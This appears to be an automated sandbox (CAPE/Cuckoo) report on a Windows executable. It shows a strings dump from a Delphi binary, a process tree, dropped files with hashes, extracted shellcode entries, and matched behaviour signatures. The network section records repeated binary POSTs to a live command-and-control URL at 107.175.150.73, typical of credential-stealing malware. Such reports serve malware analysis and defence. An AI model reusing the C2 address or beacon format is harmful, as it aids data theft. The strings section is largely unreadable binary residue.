Uh%_C
msctls_hotkey32
UhAjC
Sh`uC
ole32.dll
CoInitializeEx
ComboBoxEx32
2001, 2002 Mike Lischke
StdCtrls
StdCtrls'
Anchors
DragMode
ParentBiDiMode
ParentColor
ParentFont
ParentShowHintp.E
PopupMenu
ShowAccelChar
ShowHint
Layout
Visible
TDrawItemEvent
TWinControl
TRect
TOwnerDrawState
StdCtrls
StdCtrls
StdCtrls
StdCtrls&
BiDiMode
Constraints
DragMode
ModalResult
ParentBiDiMode
ParentFont
ParentShowHintp.E
PopupMenu
TabOrder
TabStop
Visible
StdCtrls+
Alignment
Caption
Constraints
DragMode
ParentBiDiMode
ParentColor
ParentCtl3D
ParentFont
ParentShowHintp.E
PopupMenu
TabOrder
TabStop
Visible
BUTTON
BUTTON
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
MS_WINHELP
#32770
Controls
Controls
Controls
Controls
TMouseEvent
TObject
TMouseButton
TShiftState
Integer
Integer
TMouseMoveEvent
TObject
TShiftState
Integer
Integer
TKeyEvent
TShiftState
TKeyPressEvent
TDragOverEvent
TObject
Integer
Integer
Boolean
TDragDropEvent
TObject
Integer
Integer
TStartDragEvent
TDragObject
TEndDragEvent
TObject
Integer
Integer
TDockDropEvent
TDragDockObject
Integer
Integer
TDockOverEvent
TDragDockObject
Integer
Integer
Boolean
TUnDockEvent
Boolean
TStartDockEvent
TDragDockObject
TGetSiteInfoEvent
Boolean
TCanResizeEvent
Boolean
TConstrainedResizeEvent
Integer
TMouseWheelEvent
TObject
TShiftState
Boolean
TMouseWheelUpDownEvent
TObject
Boolean
TContextPopupEvent
Boolean
Controls
Controls
Controls
Controls
Controls
ImageType
OnChange
Controls
crDefault
crArrow
crCross
crIBeam
crSizeNESW
crSizeNS
crSizeNWSE
crSizeWE
crUpArrow
crHourGlass
crDrag
crNoDrop
crHSplit
crVSplit
crMultiDrag
crSQLWait
crAppStart
crHelp
crHandPoint
crSizeAll
crSize
UhM D
Uh:#D
Uht%D
UhM%D
%s (%s)
UhW4D
Uha6D
UhyAD
Uh/GD
Uh#JD
IsControl
UhdaD
Uh$cD
UhtcD
Uh5fD
C$PVj
Ph@uD
DesignSize
UhT{D
UhC{D
t&j7j
USER32
WINNLSEnableIME
imm32.dll
ImmGetContext
ImmReleaseContext
ImmGetConversionStatus
ImmSetConversionStatus
ImmSetOpenStatus
ImmSetCompositionWindow
ImmSetCompositionFontA
ImmGetCompositionStringA
ImmIsIME
ImmNotifyIME
Delphi%.8X
ControlOfs%.8X%.8X
USER32
AnimateWindow
ActnList
ActnList
THintEvent
Boolean
ActnList
TCustomImageList
ImgList
Bitmap
UhZ!E
comctl32.dll
comctl32.dll
ImageList_WriteEx
Uh9"E
TMenuChangeEvent
TMenuItem
Boolean
TMenuDrawItemEvent
TRect
Boolean
TAdvancedMenuDrawItemEvent
TRect
TOwnerDrawState
TMenuMeasureItemEvent
Integer
TMenuActionLink$&E
TMenuItem$&E
Action
Caption
SubMenuImages
Default
ImageIndex
RadioItem
ShortCut
OnClick<#E
OnAdvancedDrawItem $E
TMenuH*E
TMainMenu<+E
AutoLineReduction
Images
OwnerDraw
MenusT-E
TPopupMenu .E
AutoLineReduction
MenuAnimation
OwnerDraw
1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
UhI4E
UhW>E
UhV?E
ShortCutText
Uh3HE
Uh?QE
UhLvE
Margin
Range
ThumbSize
Tracking
IDesignerHook8&A
TCloseEvent
TCloseAction
TCloseQueryEvent
Boolean
TShortCutEvent
Boolean
Boolean
Forms
FormsU
Align
Anchors
AutoScroll
Color
Constraints
Ctl3D
DefaultMonitor
DragMode
Enabled
ObjectMenuItem
PixelsPerInchp.E
PrintScale
Scaled
ScreenSnap
VertScrollBar
Forms
THintInfo@
Forms
PixelsPerInch
TextHeight
IgnoreFontProperty
MDICLIENT
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
layout text
TApplication
MAINICON
Uhu&F
ShT*F
vcltest3.dll
RegisterAutomation
t<j@j
Uhb7F
UhI8F
UhW;F
Uh4=F
Uh%AF
UhVJF
User32.dll
SetLayeredWindowAttributes
Uh_LF
TaskbarCreated
TTabList
TMeasureTabEvent
TObject
Integer
TDrawTabEvent
TRect
Integer
Boolean
TTabChangeEvent
TObject
Boolean
TTabSettQF
Tabs)
Anchors
Constraints
DragMode
ParentBackground
ParentShowHintp.E
PopupMenu
SelectedColor
UnselectedColor
OnDragOverTPF
SBLEFTDN
SBLEFT
SBLEFTDIS
SBRIGHTDN
SBRIGHT
SBRIGHTDIS
Uhs_F
UhOsF
UhGxF
TabOrder
TabStop
TPageChangeEvent
TObject
Boolean
TabOrder
Width
Constraints
TabFont
ParentShowHintp.E
PopupMenu
TabOrder
TabStop
TabNotBk
Grids
ColWidths
RowHeights
Outline
EOutlineChange
TObject
Integer
Outline
Outline2
LinesD*G
OnCollapsed+G
Align
Color
ParentColor
ParentCtl3D
TabOrder
TabStop
PictureLeaf
ParentFont
ParentShowHint
ShowHintp.E
Outline
UhE8G
Nodes
UhZDG
Uh=DG
UhrEG
UhUEG
MINUS
CLOSED
UheMG
Uh+OG
UhSPG
Uh8QG
Uh$RG
UhCYG
UhZjG
UhilG
XPMan
UhMmG
CheckBox1
Unit1
Error
Runtime error at 00000000
%.*d$m@
MS Sans Serif
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetVersion
GetCurrentThreadId
InterlockedDecrement
InterlockedIncrement
VirtualQuery
WideCharToMultiByte
MultiByteToWideChar
lstrlenA
lstrcpynA
LoadLibraryExA
GetThreadLocale
GetStartupInfoA
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetCommandLineA
FreeLibrary
FindFirstFileA
FindClose
ExitProcess
WriteFile
UnhandledExceptionFilter
RtlUnwind
RaiseException
GetStdHandle
user32.dll
GetKeyboardType
LoadStringA
MessageBoxA
CharNextA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
SysReAllocStringLen
SysAllocStringLen
kernel32.dll
TlsSetValue
TlsGetValue
LocalAlloc
GetModuleHandleA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
kernel32.dll
lstrcpyA
lstrcmpA
WriteFile
WaitForSingleObject
VirtualQuery
VirtualProtect
VirtualAlloc
SleepEx
Sleep
SizeofResource
SetThreadLocale
SetFilePointer
SetEvent
SetErrorMode
SetEndOfFile
ResetEvent
ReadFile
MulDiv
LockResource
LoadResource
LoadLibraryA
LeaveCriticalSection
InitializeCriticalSection
GlobalUnlock
GlobalReAlloc
GlobalHandle
GlobalLock
GlobalFree
GlobalFindAtomA
GlobalDeleteAtom
GlobalAlloc
GlobalAddAtomA
GetVersionExA
GetVersion
GetTickCount
GetThreadLocale
GetSystemInfo
GetStringTypeExA
GetStdHandle
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetLocalTime
GetLastError
GetFullPathNameA
GetFileAttributesA
GetDiskFreeSpaceA
GetDateFormatA
GetCurrentThreadId
GetCurrentProcessId
GetCPInfo
GetACP
FreeResource
InterlockedExchange
FreeLibrary
FormatMessageA
FindResourceA
FindFirstFileA
FindClose
FileTimeToLocalFileTime
FileTimeToDosDateTime
EnumCalendarInfoA
EnterCriticalSection
DeleteCriticalSection
CreateThread
CreateFileA
CreateEventA
CompareStringA
CloseHandle
version.dll
VerQueryValueA
GetFileVersionInfoSizeA
GetFileVersionInfoA
gdi32.dll
UnrealizeObject
StretchBlt
SetWindowOrgEx
SetWindowExtEx
SetWinMetaFileBits
SetViewportOrgEx
SetViewportExtEx
SetTextColor
SetStretchBltMode
SetROP2
SetPixel
SetMapMode
SetEnhMetaFileBits
SetDIBColorTable
SetBrushOrgEx
SetBkMode
SetBkColor
SelectPalette
SelectObject
SelectClipRgn
SaveDC
RestoreDC
Rectangle
RectVisible
RealizePalette
Polyline
Polygon
PolyPolyline
PlayEnhMetaFile
PatBlt
MoveToEx
MaskBlt
LineTo
IntersectClipRect
GetWindowOrgEx
GetWinMetaFileBits
GetTextMetricsA
GetTextExtentPoint32A
GetSystemPaletteEntries
GetStockObject
GetPixel
GetPaletteEntries
GetObjectA
GetEnhMetaFilePaletteEntries
GetEnhMetaFileHeader
GetEnhMetaFileBits
GetDeviceCaps
GetDIBits
GetDIBColorTable
GetDCOrgEx
GetCurrentPositionEx
GetClipBox
GetBrushOrgEx
GetBitmapBits
ExtTextOutA
ExtCreatePen
ExcludeClipRect
DeleteObject
DeleteEnhMetaFile
DeleteDC
CreateSolidBrush
CreatePenIndirect
CreatePalette
CreateHalftonePalette
CreateFontIndirectA
CreateDIBitmap
CreateDIBSection
CreateCompatibleDC
CreateCompatibleBitmap
CreateBrushIndirect
CreateBitmap
CopyEnhMetaFileA
BitBlt
user32.dll
CreateWindowExA
WindowFromPoint
WinHelpA
WaitMessage
ValidateRect
UpdateWindow
UnregisterClassA
UnionRect
UnhookWindowsHookEx
TranslateMessage
TranslateMDISysAccel
TrackPopupMenu
SystemParametersInfoA
ShowWindow
ShowScrollBar
ShowOwnedPopups
ShowCursor
SetWindowsHookExA
SetWindowTextA
SetWindowPos
SetWindowPlacement
SetWindowLongA
SetTimer
SetScrollRange
SetScrollPos
SetScrollInfo
SetRect
SetPropA
SetParent
SetMenuItemInfoA
SetMenu
SetKeyboardState
SetForegroundWindow
SetFocus
SetCursor
SetClipboardData
SetClassLongA
SetCapture
SetActiveWindow
SendMessageA
ScrollWindowEx
ScrollWindow
ScreenToClient
RemovePropA
RemoveMenu
ReleaseDC
ReleaseCapture
RegisterWindowMessageA
RegisterClipboardFormatA
RegisterClassA
RedrawWindow
PtInRect
PostQuitMessage
PostMessageA
PeekMessageA
OpenClipboard
OffsetRect
OemToCharA
MessageBoxA
MessageBeep
MapWindowPoints
MapVirtualKeyA
LoadStringA
LoadKeyboardLayoutA
LoadIconA
LoadCursorA
LoadBitmapA
KillTimer
IsZoomed
IsWindowVisible
IsWindowEnabled
IsWindow
IsRectEmpty
IsIconic
IsDialogMessageA
IsChild
IsCharAlphaNumericA
IsCharAlphaA
InvalidateRect
IntersectRect
InsertMenuItemA
InsertMenuA
InflateRect
GetWindowThreadProcessId
GetWindowTextA
GetWindowRect
GetWindowPlacement
GetWindowLongA
GetWindowDC
GetTopWindow
GetSystemMetrics
GetSystemMenu
GetSysColorBrush
GetSysColor
GetSubMenu
GetScrollRange
GetScrollPos
GetScrollInfo
GetPropA
GetParent
GetWindow
GetMessageTime
GetMenuStringA
GetMenuState
GetMenuItemInfoA
GetMenuItemID
GetMenuItemCount
GetMenu
GetLastActivePopup
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
GetIconInfo
GetForegroundWindow
GetFocus
GetDoubleClickTime
GetDlgItem
GetDesktopWindow
GetDCEx
GetDC
GetCursorPos
GetCursor
GetClipboardData
GetClientRect
GetClassNameA
GetClassInfoA
GetCaretPos
GetCapture
GetActiveWindow
FrameRect
FindWindowA
FillRect
EqualRect
EnumWindows
EnumThreadWindows
EnumClipboardFormats
EndPaint
EnableWindow
EnableScrollBar
EnableMenuItem
EmptyClipboard
DrawTextA
DrawMenuBar
DrawIconEx
DrawIcon
DrawFrameControl
DrawFocusRect
DrawEdge
DispatchMessageA
DestroyWindow
DestroyMenu
DestroyIcon
DestroyCursor
DeleteMenu
DefWindowProcA
DefMDIChildProcA
DefFrameProcA
CreatePopupMenu
CreateMenu
CreateIcon
CloseClipboard
ClientToScreen
CheckMenuItem
CallWindowProcA
CallNextHookEx
BeginPaint
CharNextA
CharLowerBuffA
CharLowerA
CharUpperBuffA
CharToOemA
AdjustWindowRectEx
ActivateKeyboardLayout
kernel32.dll
Sleep
oleaut32.dll
SafeArrayPtrOfIndex
SafeArrayGetUBound
SafeArrayGetLBound
SafeArrayCreate
VariantChangeType
VariantCopy
VariantClear
VariantInit
ole32.dll
CoTaskMemAlloc
CoCreateInstance
CoUninitialize
CoInitialize
comctl32.dll
ImageList_SetIconSize
ImageList_GetIconSize
ImageList_Write
ImageList_Read
ImageList_GetDragImage
ImageList_DragShowNolock
ImageList_SetDragCursorImage
ImageList_DragMove
ImageList_DragLeave
ImageList_DragEnter
ImageList_EndDrag
ImageList_BeginDrag
ImageList_Remove
ImageList_DrawEx
ImageList_Replace
ImageList_Draw
ImageList_GetBkColor
ImageList_SetBkColor
ImageList_ReplaceIcon
ImageList_Add
ImageList_GetImageCount
ImageList_Destroy
ImageList_Create
InitCommonControls
comdlg32.dll
GetOpenFileNameA
kernel32.dll
MulDiv
=W?n?u?
=[>b>
?(?4?H?P?T?X?\?`?d?h?l?p?~?
>3?o?
0"040K1o7
< <$<(<R>
9::>:B:F:J:N:R:
3 3$3(3,3034383<3D3O3Y3f3k3s3}3
333333333333333333
33333333?333333
33?33
33833
333333333333333333
33333
333333333333333333
33333333?333333
33?33
33833
333333333333333333
33833
338?3
C33333833?33
3334JC33333338?333
333333333333333333
333333333333333333
33333
33333
3333333:3333333383
333333333333333333
33333
333333333333333333
333333333333333333
33333
33333
3333333:3333333383
333333333333333333
UUUUUUU
UUUUUUU
UUUUUUU
UUUUUUU
UUUUUUU
UUUUUUU
UUUUUUU
3333333
3333333
3333333
3333333
3333333
3333333
3333333
3333333
3333333
3333333
3333333
UUUUUUU
UUUUUUU
UUUUUUU
UUUUUUU
3333333
3333333
3333333
3333333
3333333
33333333
@ qA
t7wwx
"08$H|
NHZ$8
vtP(b
7Project1
XPMan
System
SysInit
SysUtils
KWindows
UTypes
SysConst
^Classes
"RTLConsts
3Messages
CVariants
$VarUtils
QTypInfo
sActiveX
Outline
Consts
Forms
Printers
WWinSpool
+Graphics
CommCtrl
FlatSB
StdActns
Clipbrd
YStrUtils
*ShellAPI
&Controls
5Themes
nComCtrls
ComStrs
ExtActns
0Mapi
EActnList
vMenus
Contnrs
ImgList
dStdCtrls
Dialogs
ExtCtrls
IDlgs
3CommDlg
(ShlObj
RegStr
?WinInet
UrlMon
ExtDlgs
Buttons
8Registry
IniFiles
CUxTheme
SyncObjs
RichEdit
ToolWin
ListActns
MultiMon
WinHelpViewer
RHelpIntfs
XGrids
5MaskUtils
TabNotBk
STabs
Unit1
TTabPage
Default
TPage
Default
ebutton
clock
combobox
explorerbar
header
listview
progress
rebar
scrollbar
startpanel
status
taskband
taskbar
toolbar
tooltip
trackbar
traynotify
treeview
window
MS Sans Serif
No help keyword specified.
Menu Background
Application Workspace
Preview
Right
&Retry
Invalid input value7Invalid input value. Use escape key to abandon changes
Error creating window class
Bitmap image is not valid
Invalid property value
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Exception in safecall method
Write$Error creating variant or safe array
Floating point overflow
This file is not on VirusTotal.

Process Tree


ThGUgOMMWUNV0z.exe, PID: 1520, Parent PID: 1512
Full Path: C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe
Command Line: "C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe"
ThGUgOMMWUNV0z.exe, PID: 932, Parent PID: 1520
Full Path: C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe
Command Line: "C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe"
services.exe, PID: 464, Parent PID: 376
Full Path: C:\Windows\sysnative\services.exe
Command Line: C:\Windows\system32\services.exe
lsass.exe, PID: 568, Parent PID: 464
Full Path: C:\Windows\sysnative\lsass.exe
Command Line: C:\Windows\system32\lsass.exe

Hosts

Direct IP Country Name
Y 107.175.150.73 [VT] United States

TCP

Source Source Port Destination Destination Port
192.168.35.24 49171 107.175.150.73 80
192.168.35.24 49173 107.175.150.73 80
192.168.35.24 49176 107.175.150.73 80
192.168.35.24 49177 107.175.150.73 80
192.168.35.24 49178 107.175.150.73 80
192.168.35.24 49179 107.175.150.73 80
192.168.35.24 49180 107.175.150.73 80
192.168.35.24 49181 107.175.150.73 80
192.168.35.24 49182 107.175.150.73 80
192.168.35.24 49183 107.175.150.73 80
192.168.35.24 49184 107.175.150.73 80
192.168.35.24 49185 107.175.150.73 80
192.168.35.24 49186 107.175.150.73 80
192.168.35.24 49187 107.175.150.73 80

UDP

No UDP connections recorded.

DNS

No domains contacted.

HTTP Requests

URI Data
http://107.175.150.73/~giftioz/.mojoli/fre.php
POST /~giftioz/.mojoli/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 107.175.150.73
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 35F61B7C
Content-Length: 206
Connection: close

http://107.175.150.73/~giftioz/.mojoli/fre.php
POST /~giftioz/.mojoli/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 107.175.150.73
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 35F61B7C
Content-Length: 179
Connection: close

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name 6F2024.lck
Associated Filenames
C:\Users\user\AppData\Roaming\24CFE6\6F2024.lck
File Size 1 bytes
File Type very short file (no magic)
MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
CRC32 83DCEFB7
Ssdeep 3:U:U
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file Display Text
1
File name 6F2024.exe
Associated Filenames
C:\Users\user\AppData\Roaming\24CFE6\6F2024.exe
File Size 710656 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 ce41fb6da97d5c9fd57d6dd28ccb3d38
SHA1 80c3f9968ecdc33d817040c781e075a19a681cdf
SHA256 8b6a8a1d17b72868327d74827784df0b51617d28876f0c0951d262ba340ed5a4
CRC32 934C8265
Ssdeep 12288:M6w6OiTNMrC2ZT0vuIvQDNDq8JP8R3HGTtspmYzVMYW3w2Pg67sCKIpEINHLOJmT:MiTTMC2V6ADFSm68YV1wU+VNyJK
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
Type Extracted Shellcode
Size 4096 bytes
Virtual Address 0x003F0000
Process ThGUgOMMWUNV0z.exe
PID 1520
Path C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe
MD5 441b7d4c495abb5e02fd47f9014b3bce
SHA1 f8fa3c1147619d7cc62696b6df69c3d8854cb017
SHA256 772aa62e45bf09499da378504e676cdcc332ad3b54f404278e002e51f7702296
CRC32 B5E923A5
Ssdeep 3:ttHNx/NySly:ttLg
Yara None matched
CAPE Yara None matched
Download Download ZIP
Type Extracted Shellcode: 32-bit executable
Size 563712 bytes
Virtual Address 0x00310000
Process ThGUgOMMWUNV0z.exe
PID 1520
Path C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe
MD5 4fa0291ad86ed270421d77627074b9b8
SHA1 2f2258d323f0a044ee68a100eed2a41eaf6e46a6
SHA256 6e772cfee8ed120d4a3314b3a3229359c632522e92531322d2b0ef84c97bda50
CRC32 EF2ED9F3
Ssdeep 12288:36w6OiTNMrC2ZT0vuIvQDNDq8JP8R3HGTtspmYzVT7YW3w:3iTTMC2V6ADFSm6n3YV
Yara None matched
CAPE Yara None matched
Download Download ZIP
Type Extracted Shellcode
Size 4096 bytes
Virtual Address 0x00310000
Process ThGUgOMMWUNV0z.exe
PID 1520
Path C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe
MD5 83f6df595befd72908535400ca3d05ca
SHA1 97de6092811baac87930f219fcdc3482738b5e48
SHA256 403a8db5d760dbd338edb4249d10f013e554ff266dc1fa3c1f0370880a11e4d6
CRC32 CAF60D40
Ssdeep 48:6feL5KyHZxOUWfKkxk/I4frTWlkMbZlO3gicgThlGug8CnN2vuY/XNYBj2U3BD5G:62/TkfKkxyr+kMN/g/GN9NYMNhy
Yara None matched
CAPE Yara None matched
Download Download ZIP
Sorry! No process dumps.

Comments



No comments posted

Processing ( 10.621 seconds )

  • 5.11 CAPE
  • 1.391 Dropped
  • 1.388 TargetInfo
  • 1.385 BehaviorAnalysis
  • 1.124 Static
  • 0.103 TrID
  • 0.051 Strings
  • 0.032 NetworkAnalysis
  • 0.031 Deduplicate
  • 0.005 AnalysisInfo
  • 0.001 Debug

Signatures ( 0.423 seconds )

  • 0.081 api_spamming
  • 0.062 NewtWire Behavior
  • 0.062 decoy_document
  • 0.022 antivm_vbox_libs
  • 0.015 antiav_detectreg
  • 0.014 antiav_detectfile
  • 0.011 stealth_file
  • 0.01 infostealer_bitcoin
  • 0.01 infostealer_ftp
  • 0.009 exec_crash
  • 0.008 antiav_avast_libs
  • 0.008 ransomware_files
  • 0.006 exploit_getbasekerneladdress
  • 0.006 exploit_gethaldispatchtable
  • 0.006 antivm_vbox_files
  • 0.006 infostealer_im
  • 0.005 antivm_vmware_libs
  • 0.005 antisandbox_sunbelt_libs
  • 0.005 antisandbox_sboxie_libs
  • 0.005 masquerade_process_name
  • 0.004 malicious_dynamic_function_loading
  • 0.004 antiav_bitdefender_libs
  • 0.004 infostealer_mail
  • 0.003 Doppelganging
  • 0.003 regsvr32_squiblydoo_dll_load
  • 0.003 dynamic_function_loading
  • 0.003 persistence_autorun
  • 0.003 antianalysis_detectfile
  • 0.003 antianalysis_detectreg
  • 0.003 ransomware_extensions
  • 0.002 betabot_behavior
  • 0.002 stealth_timeout
  • 0.002 antidbg_devices
  • 0.002 geodo_banking_trojan
  • 0.002 browser_security
  • 0.001 tinba_behavior
  • 0.001 hawkeye_behavior
  • 0.001 network_tor
  • 0.001 rat_nanocore
  • 0.001 dridex_behavior
  • 0.001 injection_createremotethread
  • 0.001 antivm_generic_services
  • 0.001 antisandbox_sleep
  • 0.001 mimics_filetime
  • 0.001 kazybot_behavior
  • 0.001 InjectionCreateRemoteThread
  • 0.001 kibex_behavior
  • 0.001 antivm_generic_scsi
  • 0.001 antivm_generic_disk
  • 0.001 cerber_behavior
  • 0.001 virus
  • 0.001 antivm_parallels_keys
  • 0.001 antivm_vbox_devices
  • 0.001 antivm_vbox_keys
  • 0.001 antivm_vmware_files
  • 0.001 antivm_vmware_keys
  • 0.001 codelux_behavior
  • 0.001 disables_browser_warn
  • 0.001 rat_pcclient

Reporting ( 0.005 seconds )

  • 0.005 CompressResults
Task ID 121555
Mongo ID 5e1dde0ea21c7f1a1b4810a7
Cuckoo release 1.3-CAPE
Delete